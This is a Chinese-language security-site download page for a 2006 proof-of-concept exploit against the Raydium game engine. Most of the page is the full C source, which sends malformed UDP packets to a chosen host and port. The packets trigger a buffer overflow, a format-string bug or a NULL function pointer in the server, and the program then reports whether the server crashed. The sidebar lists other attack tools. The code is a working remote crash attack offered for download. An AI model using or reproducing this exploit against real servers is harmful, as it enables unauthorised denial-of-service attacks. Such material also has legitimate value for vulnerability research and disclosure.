首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全工具>攻击程序>软件详细
软件名称:  raydiumx.zip
文件类型:  
界面语言:  简体中文
软件类型:  国产软件
运行环境:  WinNT/2K/Xp
授权方式:  共享软件
软件大小:  8K
软件等级:  ★★★★☆
发布时间:  2006-05-15
官方网址: http://www.milw0rm.com 作者:Luigi
演示网址:
软件说明:  
Raydium <= SVN 309 Multiple Remote Vulnerabilities Exploit
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <sys/param.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define stristr strcasestr
    #define ONESEC  1
#endif



#define VER         "0.1"
#define PORT        29104
#define BUFFSZ      RAYDIUM_NETWORK_PACKET_SIZE

#define RAYDIUM_NETWORK_PACKET_OFFSET               4
#define RAYDIUM_NETWORK_PACKET_SIZE                 512

#define RAYDIUM_NETWORK_PACKET_DATA                 1
#define RAYDIUM_NETWORK_PACKET_ERROR_NO_MORE_PLACE  2
#define RAYDIUM_NETWORK_PACKET_ATTRIB_UID           3
#define RAYDIUM_NETWORK_PACKET_REQUEST_UID          4
#define RAYDIUM_NETWORK_PACKET_INFO_NAME            5
#define RAYDIUM_NETWORK_PACKET_ACK                  6
#define RAYDIUM_NETWORK_PACKET_SERVER_BEACON        7
#define RAYDIUM_NETWORK_PACKET_ODE_DATA             10
#define RAYDIUM_NETWORK_PACKET_ODE_NEWELEM          11
#define RAYDIUM_NETWORK_PACKET_ODE_REMELEM          12
#define RAYDIUM_NETWORK_PACKET_ODE_NIDWHO           13
#define RAYDIUM_NETWORK_PACKET_ODE_EXPLOSION        14
#define RAYDIUM_NETWORK_PACKET_BASE                 20



int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err);
int timeout(int sock, int sec);
u_int resolv(char *host);
void std_err(void);



struct  sockaddr_in peer;



int main(int argc, char *argv[]) {
    int     sd,
            attack,
            len;
    u_short port = PORT;
    u_char  buff[BUFFSZ];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Raydium <= SVN 309 multiple vulnerabilities " VER "\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attacks:\n"
            " 1 = buffer-overflow in raydium_log and raydium_console_line_add\n"
            " 2 = format string in raydium_log\n"
            " 3 = NULL function pointer in raydium_network_netcall_exec\n"
//            " 4 = buffer-overflow and invalid memory access in raydium_network_read\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);

    if(argc > 3) port    = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    memset(buff, 0, sizeof(buff));
    buff[0] = RAYDIUM_NETWORK_PACKET_REQUEST_UID;
    buff[1] = 0;
    *(short *)(buff + 2) = time(NULL);

    switch(attack) {
        case 1: {
            memset(buff + RAYDIUM_NETWORK_PACKET_OFFSET, 'a', RAYDIUM_NETWORK_PACKET_SIZE - RAYDIUM_NETWORK_PACKET_OFFSET);
            } break;
        case 2: {
            strcpy(buff + RAYDIUM_NETWORK_PACKET_OFFSET, "%0500x");
            } break;
        case 3: {
            buff[0] = 0xff;
            } break;
        default: {
            printf("\nError: wrong attack number\n\n");
            exit(1);
            } break;
    }

    printf("- send malformed packet for attack %d\n", attack);
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    len = send_recv(sd, buff, RAYDIUM_NETWORK_PACKET_SIZE, buff, sizeof(buff), 0);
    if(len < 0) {
        printf("- no reply from the server, it's probably crashed\n");
    }
    close(sd);

    printf("- check server:\n");
    memset(buff, 0, sizeof(buff));
    buff[0] = RAYDIUM_NETWORK_PACKET_REQUEST_UID;
    buff[1] = 0;
    *(short *)(buff + 2) = time(NULL);
    strcpy(buff + RAYDIUM_NETWORK_PACKET_OFFSET, "username");

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    if(send_recv(sd, buff, RAYDIUM_NETWORK_PACKET_SIZE, buff, sizeof(buff), 0) < 0 ) {
        printf("\n  Server IS vulnerable!!!\n\n");
    } else {
        printf("\n  Server doesn't seem vulnerable\n\n");
    }
    close(sd);
    return(0);
}



int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err) {
    int     retry,
            len;

    if(in && !out) {
        if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();
        return(0);

    } else if(in) {
        for(retry = 3; retry; retry--) {
            if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(peer))
              < 0) std_err();
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            fputs("\nError: socket timeout, no reply received\n\n", stdout);
            exit(1);
        }

    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) std_err();
    return(len);
}



int timeout(int sock, int sec) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = sec;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif
下载地址: 进入下载地址列表
下载说明: ☉推荐使用网际快车下载本站软件,使用 WinRAR v3.10 以上版本解压本站软件。
☉如果这个软件总是不能下载的请点击报告错误,谢谢合作!!
☉下载本站资源,如果服务器暂不能下载请过一段时间重试!
☉如果遇到什么问题,请到本站论坛去咨寻,我们将在那里提供更多 、更好的资源!
☉本站提供的一些商业软件是供学习研究之用,如用于商业用途,请购买正版。
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热门软件
·qwks.cpp(MS03-049)
·ms05039.rar
·fsie.rar
·Serv-U FTP溢出漏洞利用工具
·NBSI2破解版
·MS08-067.rar
·提权大杀器(2010黑帽大会公布的
·Churrasco.zip
·tfn2k.tgz
·SMBdie
·ms04-011.rar
·WinArpAttacker3.50.rar
  相关软件
·genecysbof.zip
·WinArpAttacker3.50.rar
·BTvoyager.zip
·empiredos.zip
·sophos_chunkheap.chm
·outgunx.zip
·openttdx.zip
·sophos_namelen.chm
·skulltagfs.zip
·sophos_intifiniti.rar
·arptools-1.0.0.tar.gz
·1stCleanRc-Xp.zip
 
  推荐广告
CopyRight © 2002-2020 VFocuS.Net All Rights Reserved